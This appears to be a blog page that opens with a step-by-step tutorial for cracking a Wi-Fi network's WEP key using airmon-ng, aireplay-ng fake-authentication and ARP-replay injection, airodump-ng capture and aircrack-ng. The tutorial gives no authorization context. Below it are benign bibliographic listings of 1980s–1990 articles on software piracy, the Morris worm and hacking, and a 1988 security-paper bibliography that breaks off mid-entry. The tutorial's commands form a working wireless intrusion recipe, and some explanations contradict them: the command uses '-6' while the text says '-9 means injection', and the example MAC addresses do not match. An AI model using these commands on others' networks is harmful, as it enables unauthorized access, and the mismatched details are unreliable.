Simple Wi-Fi WEP Crack

wifi-300x189

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run:tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done! icon smile Simple Wi Fi WEP Crack [TUTORIAL]

Collection of Computer Security Articles, Part 5

90109601
Title: Rights and Wrongs of Software
Authors: Charles, Dan
Journal: New Scientist Vol: 127 Iss: 1736 Date: Sep 29, 1990 pp: 44-48
Jrnl Code: GNSC ISSN: 0262-4079 Jrnl Group: SciTech
Abstract: Software copyrights have received much attention as software piracy
proliferates. Some experts believe software restrictions will
inhibit the development of better products and the growth of small
firms. Photograph; Illustration
Subjects: Software; Copyright; Computer programming & languages; Computer
crime
Type: Feature
Length: Long (31+ col inches)

90091060
Title: Viewpoint
Authors: Lewis, Bill
Journal: Audio-Visual Communications Vol: 24 Iss: 8 Date: Aug 1990 pp: 6
Jrnl Code: GAVC ISSN: 0004-7562 Jrnl Group: Academic
Abstract: An editorial discusses plagiarism among the software industry. In
the age of digital information everything is easy to duplicate.
Subjects: Copyright; Computers & computer technology; Software; Piracy
Type: Editorial
Length: Medium (10-30 col inches)

90085769
Title: Theft in the Classroom
Authors: Thornburg, David D
Journal: inCider Vol: 8 Iss: 8 Date: Aug 1990 pp: 88-90
Jrnl Code: GINC ISSN: 0740-0101 Jrnl Group: SciTech
Abstract: The issue of software piracy as it relates to use of computer
programs in the classroom is discussed. More sources of public
funding are needed so schools won’t be inclined to copy programs
illegally.
Subjects: Education & schools; Copyright; Software; Computer crime
Type: Commentary
Length: Medium (10-30 col inches)

90080229
Title: Pieces of 1-2-3
Authors: Anonymous
Journal: Economist Vol: 316 Iss: 7663 Date: Jul 14, 1990 pp: 73
Jrnl Code: ECT ISSN: 0013-0613 Jrnl Group: Business; News
Abstract: The EC has issued a directive on the issue of computer software
piracy. The directive is aimed at the software houses, as opposed
to hackers and pirates. Illustration
Subjects: Laws & legislation; Software; Piracy; European Community–EC
Type: News
Length: Short (1-9 col inches)

90021544
Title: Tech Talk: The Crackdown on Corporate Pirates
Authors: Davis, Stephen
Journal: Working Woman Vol: 15 Iss: 3 Date: Mar 1990 pp: 50
Jrnl Code: WKW ISSN: 0145-5761 Jrnl Group: Business; Lifestyles
Abstract: Ten of the software industry’s largest software vendors have formed
a special task force within the Software Publishers Association to
prosecute abusers. Software piracy is discussed, including ways to
protect one’s company against piracy. Illustration
Subjects: Piracy; Software; Telecommunications industry
Type: Feature
Length: Medium (10-30 col inches)

89099445
Title: Fighting Temptation
Authors: Muse, Dan
Journal: inCider Vol: 7 Iss: 10 Date: Oct 1989 pp: 8
Jrnl Code: GINC ISSN: 0740-0101 Jrnl Group: SciTech
Abstract: An editorial discusses the issue of software piracy. Just because
the technology is available doesn’t make it legal to copy software.
Subjects: Piracy; Software
Type: Editorial
Length: Medium (10-30 col inches)

89091606
Title: Piracy and Protection
Authors: Hild, John
Journal: Editor & Publisher Vol: 122 Iss: 35 Date: Sep 2, 1989
pp: 22PC, 39PC
Jrnl Code: GEDP ISSN: 0013-094X Jrnl Group: Business
Abstract: Despite court actions and publicity, it is estimated that software
piracy is still flourishing. One software producer that is working
hard against piracy is Xyquest, which produces the popular and much
bootleggedXywrite word processing packages.
Subjects: Piracy; Software
Companies: Xyquest Inc
Type: Commentary
Length: Long (31+ col inches)

89074955
Title: Pursuing Pirates
Authors: Martin, Janette
Journal: Datamation Vol: 35 Iss: 15 Date: Aug 1, 1989 pp: 41-42
Jrnl Code: DAT ISSN: 0011-6963 Jrnl Group: Business; SciTech
Abstract: The efforts of the Business Software Association to stop software
piracy in Europe are described. The first raids by the group were
staged in Italy, where software piracy is a major problem for the
Italian software industry. Photograph
Subjects: Software; Piracy; Europe; Business Software Association
Type: News
Length: Long (31+ col inches)

89074541
Title: This Could Be the Key to Keeping Computer Intruders out
Authors: Armstrong, Larry
Journal: Business Week Iss: 3117 Date: Jul 31, 1989 pp: 54
Jrnl Code: BWE ISSN: 0739-8395 Jrnl Group: Business
Abstract: Computer hackers, software piracy and viruses are good news for
Rainbow Technologies Inc. The company makes products that protect
software from pilferage. Photograph
Subjects: Company profiles; Financial performance; Securities prices
Companies: Rainbow Technologies
Type: General Information
Length: Short (1-9 col inches)

89015701
Title: Holland Awaits Stronger Anti-Piracy Law
Authors: Hoos, Willem
Journal: Billboard Vol: 101 Iss: 5 Date: Feb 4, 1989 pp: 66-67
Jrnl Code: GBIL ISSN: 0006-2510 Jrnl Group: Business
Abstract: Holland still does not have firm new legislation on audio and video
software piracy because a government bill introduced two years ago
has not even been discussed by Parliament. The government’s
procrastination over stiffer laws concerning piracy has frustrated
the record industry.
Subjects: Piracy; Laws & legislation; Recording industry; Video industry;
Netherlands
Type: News
Length: Medium (10-30 col inches)

88113532
Title: Say It Ain’t So, Joe
Authors: Kennedy, William P.
Journal: inCider Vol: 6 Iss: 9 Date: Sep 1988 pp: 20
Jrnl Code: GINC ISSN: 0740-0101 Jrnl Group: SciTech
Abstract: The author discusses a recent trip to meet a software pirater.
Although talented, the man seemed obsessed with pirating software.
Subjects: Software; Piracy
Type: Commentary
Length: Medium (10-30 col inches)

Collection of Computer Security Articles, Part 4

88178609
Title: Greater Awareness of Security in Aftermath of Computer Worm
Authors: Shulman, Seth; Palca, Joseph
Journal: Nature Vol: 336 Iss: 6197 Date: Nov 24, 1988 pp: 301
Jrnl Code: GNAA ISSN: 0028-0836 Jrnl Group: Academic; SciTech
Abstract: The recent attack of an unauthorized computer program upon thousands
of computer systems around the US using the ARPANET, Milnet and NSF
Net computer networks and the ensuing debate over the need for
increased security are described. Illustration
Subjects: Computers & computer technology; Computer crime; Security systems
Type: Feature
Length: Medium (10-30 col inches)

88162631
Title: Another Infection
Authors: Anonymous
Journal: Time Vol: 132 Iss: 24 Date: Dec 12, 1988 pp: 33
Jrnl Code: GTIM ISSN: 0040-781X Jrnl Group: News
Abstract: Only five weeks after the Defense Department’s Arpanet computer
network was infected by a computer virus, the Mitre Corp has warned
the Pentagon that the Milnet military information system has also
been violated.
Subjects: Computer crime; Computer networks; Department of Defense
Companies: Mitre Corp
Type: News
Length: Short (1-9 col inches)

88148837
Title: Worming Into a Computer’s Vulnerable Core
Authors: Peterson, Ivars
Journal: Science News Vol: 134 Iss: 20 Date: Nov 12, 1988 pp: 310
Jrnl Code: GSCN ISSN: 0036-8423 Jrnl Group: SciTech
Abstract: A computer virus recently invaded more than 6,000 computers linked
by ARPANET. Graduate student Robert T. Morris, Jr is thought to be
the originator of the program.
Subjects: Computers & computer technology; Computer programming & languages;
Security systems
Names: Morris, Robert Jr
Type: News
Length: Medium (10-30 col inches)

88103028
Title: The Evolution of ARPANET
Authors: Schultz, Brad
Journal: Datamation Vol: 34 Iss: 15 Date: Aug 1, 1988 pp: 71, 73+
Jrnl Code: DAT ISSN: 0011-6963 Jrnl Group: SciTech; Business
Abstract: ARPANET, the world’s first packet switching network, has been a
vital element in the nation’s computer and communications research
activities, but its managers determined that it was technologically
obsolete. The ARPANET lives on in the networks it has spawned, now
known as the Internet. Photograph
Subjects: Telecommunications industry; Computers & computer technology
Type: Feature
Length: Long (31+ col inches)

Collection of Computer Security Articles, Part 3

90021932
Title: Is Computer Hacking a Crime?
Authors: Anonymous
Journal: Harper’s Vol: 280 Iss: 1678 Date: Mar 1990 pp: 45-57
Jrnl Code: GHAR ISSN: 0017-789X Jrnl Group: Commentary
Abstract: A round-table discussion on the ethics of computer hacking is
presented. The panelists include computer hackers, scientists,
activists and media members.
Subjects: Computer crime; Ethics; Social life & customs
Type: Feature
Length: Long (31+ col inches)

90008297
Title: Computer Hacking Goes on Trial
Authors: Allman, William F
Journal: U.S. News & World Report Vol: 108 Iss: 3 Date: Jan 22, 1990
pp: 25
Jrnl Code: GUNW ISSN: 0041-5537 Jrnl Group: News
Abstract: The trial of Robert Morris, a graduate student who unleashed a
“worm” that caused computers around the US to grind to a halt on Nov
2, 1988, is discussed. Photograph; Illustration
Subjects: Trials; Computer crime
Names: Morris, Robert
Type: News
Length: Medium (10-30 col inches)

89121419
Title: Hackers: Is a Cure Worse Than the Disease?
Authors: Lewyn, Mark
Journal: Business Week Iss: 3136 Date: Dec 4, 1989 pp: 37-38
Jrnl Code: BWE ISSN: 0739-8395 Jrnl Group: Business
Abstract: Because of computer hacking, Pentagon officials would like to add
more layers of security to protect their networks. But this would
limit access to university and government scientists, who use the
information the most. Photograph
Subjects: Computer crime; Security systems; Computer networks
Names: Morris, Robert Jr
Type: Commentary
Length: Medium (10-30 col inches)

89059272
Title: Let’s Get Reckless
Authors: Gaines, Donna
Journal: Village Voice Vol: 34 Iss: 23 Date: Jun 6, 1989 pp: S4, S15
Jrnl Code: GVIV ISSN: 0042-6180 Jrnl Group: Commentary
Abstract: The developing social importance of computer viruses is explored.
Computer hacking and computer viruses have penetrated the
consciousness of the mainstream media and are being countered by
federal legislation. Illustration
Subjects: Computer crime; Social conditions & trends
Type: Commentary
Length: Medium (10-30 col inches)

Collection of Computer Security Articles, Part 2

90091236
Title: Sending a Signal
Authors: Denning, Peter J
Journal: Communications of the ACM Vol: 33 Iss: 8 Date: Aug 1990
pp: 11, 13
Jrnl Code: GACM ISSN: 0001-0782 Jrnl Group: SciTech; Academic
Abstract: An editorial discusses Robert Morris Jr’s criminal sentence. Morris
was convicted in Jan 1990 of releasing a worm program into the
Research Internet in Nov 1988. Morris was given a suspended jail
term, a fine of $10,000 and 400 hours of community service.
Illustration
Subjects: Computer crime; Criminal sentences; Fines & penalties; Crime &
criminals
Names: Morris, Robert T Jr
Type: Editorial
Length: Medium (10-30 col inches)

90020575
Title: Morris Code
Authors: Hafner, Katie
Journal: New Republic Vol: 202 Iss: 8 Date: Feb 19, 1990 pp: 15-16
Jrnl Code: GTNR ISSN: 0028-6583 Jrnl Group: Commentary
Abstract: Robert Tappan Morris, the young man who infiltrated Internet, a
nationwide computer network, has recieved a stiff penalty from the
Justice Department. His crime was actually far less pernicious than
most others.
Subjects: Computer crime; Criminal sentences
Names: Morris, Robert T Jr
Type: Feature
Length: Long (31+ col inches)

89001456
Title: Hostile Takeovers
Authors: Wallich, Paul
Journal: Scientific American Vol: 260 Iss: 1 Date: Jan 1989 pp: 22-26
Jrnl Code: GSCA ISSN: 0036-8733 Jrnl Group: SciTech
Abstract: Computer networks like INTERNET that are accessible are also
vulnerable to computer viruses. Passwords and encryption may make
networks more secure.
Subjects: Computer networks; Security systems
Type: General Information
Length: Medium (10-30 col inches)

88149556
Title: ‘Clever, Nasty and Definitely Antisocial’
Authors: Anonymous
Journal: Newsweek Vol: 112 Iss: 20 Date: Nov 14, 1988 pp: 24-25
Jrnl Code: GNEW ISSN: 0028-9604 Jrnl Group: News
Abstract: Cornell University graduate student Robert Morris, Jr. unleashed a
virus–a rogue computer program that replicates itself endlessly–in
Internet, a network that links 50,000 computers. Photograph
Subjects: Software; Viruses; Computer networks
Names: Morris, Robert Jr
Type: General Information
Length: Short (1-9 col inches)

88148517
Title: Worm Invades Computer Networks
Authors: Marshall, Eliot
Journal: Science Vol: 242 Iss: 4880 Date: Nov 11, 1988 pp: 855-856
Jrnl Code: GSCI ISSN: 0036-8075 Jrnl Group: SciTech; Academic
Abstract: Internet, the major computer network for researchers in the US and
overseas, was disrupted for two days last week due to the presence
of a computer virus. The virus and attempts by computer experts at
the University of California at Berkeley and the Massachusetts
Institute of Technology to cure it are examined.
Subjects: Computer crime; Computer networks; University of
California-Berkeley; Massachusetts Institute of Technology
Type: News
Length: Long (31+ col inches)

88103028
Title: The Evolution of ARPANET
Authors: Schultz, Brad
Journal: Datamation Vol: 34 Iss: 15 Date: Aug 1, 1988 pp: 71, 73+
Jrnl Code: DAT ISSN: 0011-6963 Jrnl Group: SciTech; Business
Abstract: ARPANET, the world’s first packet switching network, has been a
vital element in the nation’s computer and communications research
activities, but its managers determined that it was technologically
obsolete. The ARPANET lives on in the networks it has spawned, now
known as the Internet. Photograph
Subjects: Telecommunications industry; Computers & computer technology
Type: Feature
Length: Long (31+ col inches)

88103027
Title: A Close-Up of Transmission Control Protocol/Internet Protocol
(TCP/IP)
Authors: Anonymous
Journal: Datamation Vol: 34 Iss: 15 Date: Aug 1, 1988 pp: 72
Jrnl Code: DAT ISSN: 0011-6963 Jrnl Group: SciTech; Business
Abstract: The entire Internet complies with the Internet Protocol (IP), which
was developed along with the Transmission Control Protocol (TCP) to
meet the Defense department’s especially tough internetworking
requirements.
Subjects: Telecommunications industry; Computers & computer technology;
Defense industry
Type: General Information
Length: Medium (10-30 col inches)

Collection of Comuter Security Articles

87031153
Title: The Technobandits
Authors: Gibbs, Nancy R
Journal: Time Vol: 130 Iss: 22 Date: Nov 30, 1987 pp: 42-44
Jrnl Code: GTIM ISSN: 0040-781X Jrnl Group: News
Abstract: The Charles McVey case highlights the problem of protecting secrets
in an open society. Because of stolen high-tech goods and secrets,
the US will insist on tighter enforcement and higher penalties for
violators that now exist.
Subjects: Crime & criminals; Computer crime; Smuggling; Espionage
Names: McVey, Henry
Type: News
Length: Long (31+ col inches)

87031026
Title: Computer Sabotage: Programmed to Sneeze
Authors: Anonymous
Journal: Economist Vol: 305 Iss: 7526 Date: Nov 28, 1987 pp: 90
Jrnl Code: ECT ISSN: 0013-0613 Jrnl Group: Business; News
Abstract: Computer viruses are discussed. Almost every computer system is
vulnerable to viruses, which can crash programs or infect a memory
system. Catching a virus is easier than apprehending its creator.
Subjects: Computers & computer technology; Computer crime; Computer
programming & languages; Crime & criminals
Type: News
Length: Medium (10-30 col inches)

87029548
Title: Data Protection: Big Brother Is Being Watched
Authors: Anonymous
Journal: Economist Vol: 305 Iss: 7523 Date: Nov 7, 1987 pp: 63-66
Jrnl Code: ECT ISSN: 0013-0613 Jrnl Group: Business; News
Abstract: The Data Protection Act of 1984 is designed to look vigorously into
allegations of the misuse of personal data.
Subjects: Computer crime; Privacy; United Kingdom–UK
Type: Feature
Length: Medium (10-30 col inches)

87018129
Title: Don’t Tread on My Data
Authors: Elmer-DeWitt, Phillip
Journal: Time Vol: 130 Iss: 1 Date: Jul 6, 1987 pp: 84
Jrnl Code: GTIM ISSN: 0040-781X Jrnl Group: News
Abstract: Richard Kusserow, after becoming inspector general for the
Department of Health and Human Services, decided to crack down on
computer fraud. In order to do this, however, there was an invasion
of privacy and the Fourth Amendment was violated. Photograph
Subjects: Privacy; Fraud; Computer crime; Investigations; Department of Health
& Human Services
Names: Kusserow, Richard
Type: Feature
Length: Medium (10-30 col inches)

87015192
Title: Brady: Byte-ing the Hand that Feeds It
Authors: Brady, James
Journal: Advertising Age Vol: 58 Iss: 23 Date: Jun 1, 1987 pp: 48
Jrnl Code: ADA ISSN: 0001-8899 Jrnl Group: Business
Abstract: “Trojan horses,” computer programs that enter a system disguised as
something important and then erase or scramble vital information,
are discussed. These renegade programs are held up as justification
for ignoring the computer craze.
Subjects: Computer crime; Computers & computer technology; Computer
programming & languages
Type: Commentary
Length: Long (31+ col inches)

87000399
Title: Last Word
Authors: Graybill, Christopher
Journal: Omni Vol: 9 Iss: 4 Date: Jan 1987 pp: 114
Jrnl Code: GOMN ISSN: 0149-8711 Jrnl Group: SciTech
Abstract: Computer crimes of a different sort than embezzlement, fraud, or
virus-dropping are portrayed in a satiric short story.
Subjects: Short stories
Type: Fiction
Length: Medium (10-30 col inches)

86042465
Title: No Tempest in a Teapot
Authors: Donlan, Thomas G
Journal: Barron’s Vol: 66 Iss: 39 Date: Sep 29, 1986 pp: 14, 53
Jrnl Code: BAR ISSN: 0005-6073 Jrnl Group: Business
Abstract: The development of microspy has enhanced the electronic
eavesdropping industry. The use of microspy by government
agencies–the NSA and the CIA–in keeping tabs on private industry
is discussed. Illustration
Subjects: Electronic eavesdropping; Intelligence gathering; Business &
industry; Computer crime; National Security Agency; Central
Intelligence Agency–CIA
Type: Feature
Length: Long (31+ col inches)

86039447
Title: House Panel Moves against Computer Fraud
Authors: Cohodas, Nadine
Journal: Congressional Quarterly Weekly Report Vol: 44 Iss: 19
Date: May 10, 1986 pp: 1038
Jrnl Code: GCQW ISSN: 0010-5910 Jrnl Group: Commentary; News
Abstract: The House Judiciary Committee on May 6, 1986 approved legislation to
help continue the federal government’s crackdown on computer crime.
The legislation is examined.
Subjects: Laws & legislation; Computer crime; Federal government; House of
Representatives-Judiciary, Committee on the
Type: Feature
Length: Medium (10-30 col inches)

86031448
Title: Are Data Bases a Threat to National Security?
Authors: Starr, Barbara
Journal: Business Week Iss: 2975 Date: Dec 1, 1986 pp: 39
Jrnl Code: BWE ISSN: 0739-8395 Jrnl Group: Business
Abstract: The Pentagon intends to add new controls over the contents of
computer data bases for fear of information reaching the Soviet
bloc. Computer data bases are goldmines for foreign agents
interested in technical and economic information. Illustration
Subjects: Classified information; Computer crime; Data bases; Government
regulation; Department of Defense
Type: Feature
Length: Medium (10-30 col inches)

86026687
Title: A Victory for the Pirates?
Authors: Elmer-DeWitt, Philip
Journal: Time Vol: 128 Iss: 16 Date: Oct 20, 1986 pp: 86
Jrnl Code: GTIM ISSN: 0040-781X Jrnl Group: News
Abstract: In an attempt to halt software piracy, the makers of
personal-computer software began copy protection measures. However,
consumer complaints that they are inconvenient, has caused the
companies to give up and remove them. Illustration
Subjects: Computers & computer technology; Personal computers; Software;
Computer crime; Piracy
Type: Feature
Length: Medium (10-30 col inches)

86015548
Title: Software Pirates Beware: Berkin Is Out for Blood
Authors: Ticer, Scott
Journal: Business Week Iss: 2951 Date: Jun 16, 1986 pp: 83
Jrnl Code: BWE ISSN: 0739-8395 Jrnl Group: Business
Abstract: Geoffrey A. Berkin, an associate general counsel at personal
computer software publisher Ashton-Tate Inc is profiled. Berkin’s
efforts have earned Ashton-Tate the reputation of champion against
domestic piracy. Photograph
Subjects: Biographical profiles; Company profiles; Computer crime
Names: Berkin, Geoffrey A
Companies: Ashton-Tate Corp
Type: Feature
Length: Medium (10-30 col inches)

86014490
Title: ‘Star Wars’ Crime: New Threat to Corporate Security
Authors: McCartney, Laton
Journal: Business Month Vol: 127 Iss: 6 Date: Jun 1986 pp: 85-88
Jrnl Code: DMI ISSN: 0892-4090 Jrnl Group: Business
Abstract: Satellite espionage is a new and highly sophisticated kind of
computer larceny that could have disastrous consequences. Although
most satellites are built with some security measures, all of them
are vulnerable to interception or disruption by someone who knows
where the satellite is located, the frequency it uses for
transmission and the sender’s code. Illustration
Subjects: Computers & computer technology; Computer crime; Satellites;
Espionage
Type: Feature
Length: Long (31+ col inches)

86014067
Title: Continuum: Computer Virus
Authors: Gross, Steve
Journal: Omni Vol: 8 Iss: 9 Date: Jun 1986 pp: 35
Jrnl Code: GOMN ISSN: 0149-8711 Jrnl Group: SciTech
Abstract: The traumas a computer virus can cause for a computer owner are
discussed. With the increasing use of computer bulletin boards,
killer programs are a threat to business and personal computer
systems alike.
Subjects: Computers & computer technology; Computer crime; Software
Type: Feature
Length: Medium (10-30 col inches)

BIBLIOGRAPHY OF TECHNICAL PAPERS ON COMPUTER SECURITY

Note: This bibliography was prepared in 1988. A bibliography is

currently being developed that will encompass 1989.

ACCESS CONTROL
AUTHOR: Arsenault, Alfred W.

TITLE: Developments in Guidance for Trusted
Computer Networks

CATEGORY: Access Control
ORGANIZATION: National Computer Security Center
Ft. George G. Meade, MD
DESCRIPTION: Discusses the current status and
future plans for guidance in the area of trusted
computer networks.

AUTHOR: Branstad, Dennis K.

TITLE: Considerations for Security in the OSI
Architecture

CATEGORY: Access Control
ORGANIZATION: Institute for Computer Sciences
and Technology
National Institute of Standards
and Technology
Gaithersburg, MD 20899
DESCRIPTION: Discusses several goals of security
in the OIS architecture as well as where and how
the security services that satisfy them could be
implemented.
AUTHOR: Branstad, Dennis K.

TITLE: SP4: A Transport Encapsulation Security
Protocol

CATEGORY: Access Control
ORGANIZATION: National Institute of Standards and
Technology
DESCRIPTION: Discusses SDNS architecture that is
designed to satisfy the security requirements of
both classified and unclassified applications.
AUTHOR: Clyde, Allan R.

TITLE: Insider Threat Identification Systems

CATEGORY: Access Control
ORGANIZATION: A.R. Clyde Associates
10101 Grosvenor Place, #2006
Rockville, MD 20852
DESCRIPTION: Discusses basic components of a
insider threat identification system and how
internal surveillance affects such a system.
AUTHOR: Engelman, Captain Paul D.

TITLE: The Application of “Orange Book” Standards
to Secure Telephone Switching Systems

CATEGORY: Access Control
ORGANIZATION: Scott Air Force Base
IL 62225
DESCRIPTION: Discusses reference monitor concept
and provides the motivation for applying “Orange
Book” standards to telephone systems.
AUTHOR: Fellow, Jon, Hemenway, Judy, Kelem, Nancy
and Romero, Sandra
TITLE: The Architecture of a Distributed Trusted
Computing Base

CATEGORY: Access Control
ORGANIZATION: Unisys
2525 Colorado Blvd.
Santa Monica, CA 90405
DESCRIPTION: Explores the difference between
monolithic and distributed trusted computing bases,
using as an example an actual system.
AUTHOR: Halpern, Daniel J. & Owre, Sam

TITLE: Specification and Verification Tools for
Secure Distributed Systems

CATEGORY: Access Control
ORGANIZATION: Sytek, Inc.
1225 Charleston Road
Mountain View, CA 94043
DESCRIPTION: This paper examines the fields of
formal specification and verification, software
engineering support, and security.

 
AUTHOR: Johnson, Howard L. & Layne, Daniel J.

TITLE: A Mission – Critical Approach to Network
Security

CATEGORY: Access Control
ORGANIZATION: Computer Technology Associates, Inc.
7150 Campus Drive, Suite 100
Colorado Springs, CO 80918
DESCRIPTION: This paper presents an approach to
network security that treats sensitivity issues
independent of criticality issues to gain
architectural and economic advantage.

AUTHOR: Linn, John

TITLE: SDNS Products in the Type II Environment

CATEGORY: Access Control
ORGANIZATION: BBN Communications Corporation
Cambridge, MA
DESCRIPTION: This paper examines the ramifications
of communications security for the type II
environment and considers the role that SDNS can
play in satisfying that environments needs.

AUTHOR: Loscocco, Peter

TITLE: A Security Policy and Model for a MLS LAN

CATEGORY: Access Control
ORGANIZATION: Office of Research and Development
National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
DESCRIPTION: This paper explains in detail the
MLS LAN implemented into the Department of
Defense Security Policy.

AUTHOR: Mizuno, Massaaki & Oldehoef, Arthur E.

TITLE: Information Flow Control in a Distributed
Object – Oriented System with Statically
Bound Object Variables
CATEGORY: Access Control
ORGANIZATION: Department of Computer Science
Iowa State University
Ames, Iowa 50011
DESCRIPTION: This paper presents a combined
approach of compile-time and run-time information
flow certification.
AUTHOR: Nelson, Ruth

TITLE: SDNS Services and Architecture

CATEGORY: Access Control
ORGANIZATION: Electronic Defense Communications
Directorate
GTE Government Systems Corporation
77 A Street, Needham, MA 02194
DESCRIPTION: This paper focuses on the protocols
and system architecture of the secure data network
system.
AUTHOR: Parker, T.A.

TITLE: Security in Open Systems: A Report on the
Standards Work of ECMA’S TC32/TG9

CATEGORY: Access Control
ORGANIZATION: ICL Defence Systems UK
DESCRIPTION: This paper addresses the topic of
access authorization and offers a uniform approach
which caters for a spectrum of access control
schemes ranging from capability systems to access
control lists.
AUTHOR: Rogers, Herbert L.

TITLE: An Overview of the Caneware Program

CATEGORY: Access Control
ORGANIZATION: National Security Agency – C6
Ft. George G. Meade, MD 20755
DESCRIPTION: The purpose of this paper is to
present an overview of the caneware program
functionality and its concern with communications
security.
AUTHOR: Schnackenberg, Dan

TITLE: Applying the Orange Book to an MLS LAN

CATEGORY: Access Control
ORGANIZATION: Boeing Aerospace Company
Mail Stop 87-06
P.O. Box 3999
Seattle, WA 98124
DESCRIPTION: This paper presents an overview of
Boeing’s multilevel secure local area network and
a discussion of the issues that have arisen from
applying the DOD Trusted Computer System Evaluation
Criteria to this MLS LAN.
AUTHOR: Sheehan, Edward R.

TITLE: Access Control Within SDNS

CATEGORY: Access Control
ORGANIZATION: Analytics Incorporated
9821 Broken Land Parkway
Columbia, MD 21046

DESCRIPTION: This paper addresses the subject of
access control within the Secure Data Network
System and its fundamental elements.

AUTHOR: Tater, Gary L. & Kerut, Edmund G.

TITLE: The Secure Data Network System:
An Overview

CATEGORY: Access Control
ORGANIZATION: None Specified
DESCRIPTION: This paper discusses the rationale
and programmatic decisions for the Secure Data
Network System project.
AUTHOR: Teng, Henry S. & Brown, Dr. David C.

TITLE: An Expert System Approach to Security
Inspection of a VAX/VMS System in a
Network Environment
CATEGORY: Access Control
ORGANIZATION: Artificial Intelligence Research
Group
Computer Science Department
Worcester Polytechnic Institute
Worcester, MA 01609
DESCRIPTION: This paper addresses the development
of the XSAFE prototype expert system and its use
for computer security inspection of a VAX/VMS
system in a network environment.
AUDIT AND EVALUATION

AUTHOR: Lanenga, David

TITLE: Security Evaluations of Computer Systems

CATEGORY: Audit and Evaluation
ORGANIZATION: National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
DESCRIPTION: This paper describes the process of
computer security evaluations as presently
performed by the National Computer Security Center.
CERTIFICATION

AUTHOR: Ferris, Martin & Cerulli, Andrea

TITLE: Certification: A Risky Business

CATEGORY: Certification
ORGANIZATION: National Security Agency
Ft. George G. Meade. MD 20755
DESCRIPTION: This paper addresses certification
in management terms, provides examples of
certification in everyday life, and examines ways
to maximize the use of national resources and
policies to achieve a certified AIS application.

CONTINGENCY PLANNING
AUTHOR: Judd, Thomas C. & Ward, Howard W. Jr.

TITLE: Return to Normalcy: Issues in Contingency
Planning

CATEGORY: Contingency Planning
ORGANIZATION: Federal Reserve System
Culpepper, Va
DESCRIPTION: This paper presents a “Cook Book”
approach as an effort to provide a kind of
checklist of things to do.

AUTHOR: Pardo, O.R.

TITLE: Computer Disaster Recovery Planning: A
Fast – Track Approach

CATEGORY: Contingency Planning
ORGANIZATION: Bechtel Eastern Power Corporation
15740 Shady Grove Road
Gaithersburg, MD 20877
(301) 258-4023
DESCRIPTION: This paper outlines a method of
implementing a contingency plan in a single,
relatively short effort.
DATA BASE MANAGEMENT
AUTHOR: Hale, Michael W.

TITLE: Status of Trusted Database Management
System Interpretations

CATEGORY: Data Base Management
ORGANIZATION: National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
(301) 859-4452
DESCRIPTION: This paper addresses the rationale
and security issues that are unique to database
management systems.

AUTHOR: Henning, Ronda R. and Walker, Swen A.

TITLE: Data Integrity vs. Data Security: A
Workable Compromise

CATEGORY: Data Base Management
ORGANIZATION: National Computer Security Center
Office of Research and Development
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
DESCRIPTION: This paper addresses the issue of
unauthorized modification of data and the
implementation of the current state of the art in
integrity policies.
AUTHOR: Knode, Ronald B.

TITLE: TRUDATA: The Road To a Trusted DBMS

CATEGORY: Data Base Management
ORGANIZATION: ORI/Intercom Systems Corporation
9710 Patuxent Woods Drive
Columbia, MD 21046
(301) 381-9740
DESCRIPTION: This paper describes the INTERCON
Trusted Data Base Management System, including
its development, guidelines, system architecture,
security policy, and implementation status.
AUTHOR: Rougeau, Patricia A. & Sturms, Edwards D.

TITLE: The SYBASE Secure Dataserver: A Solution
To The Multilevel Secure DBMS Problem

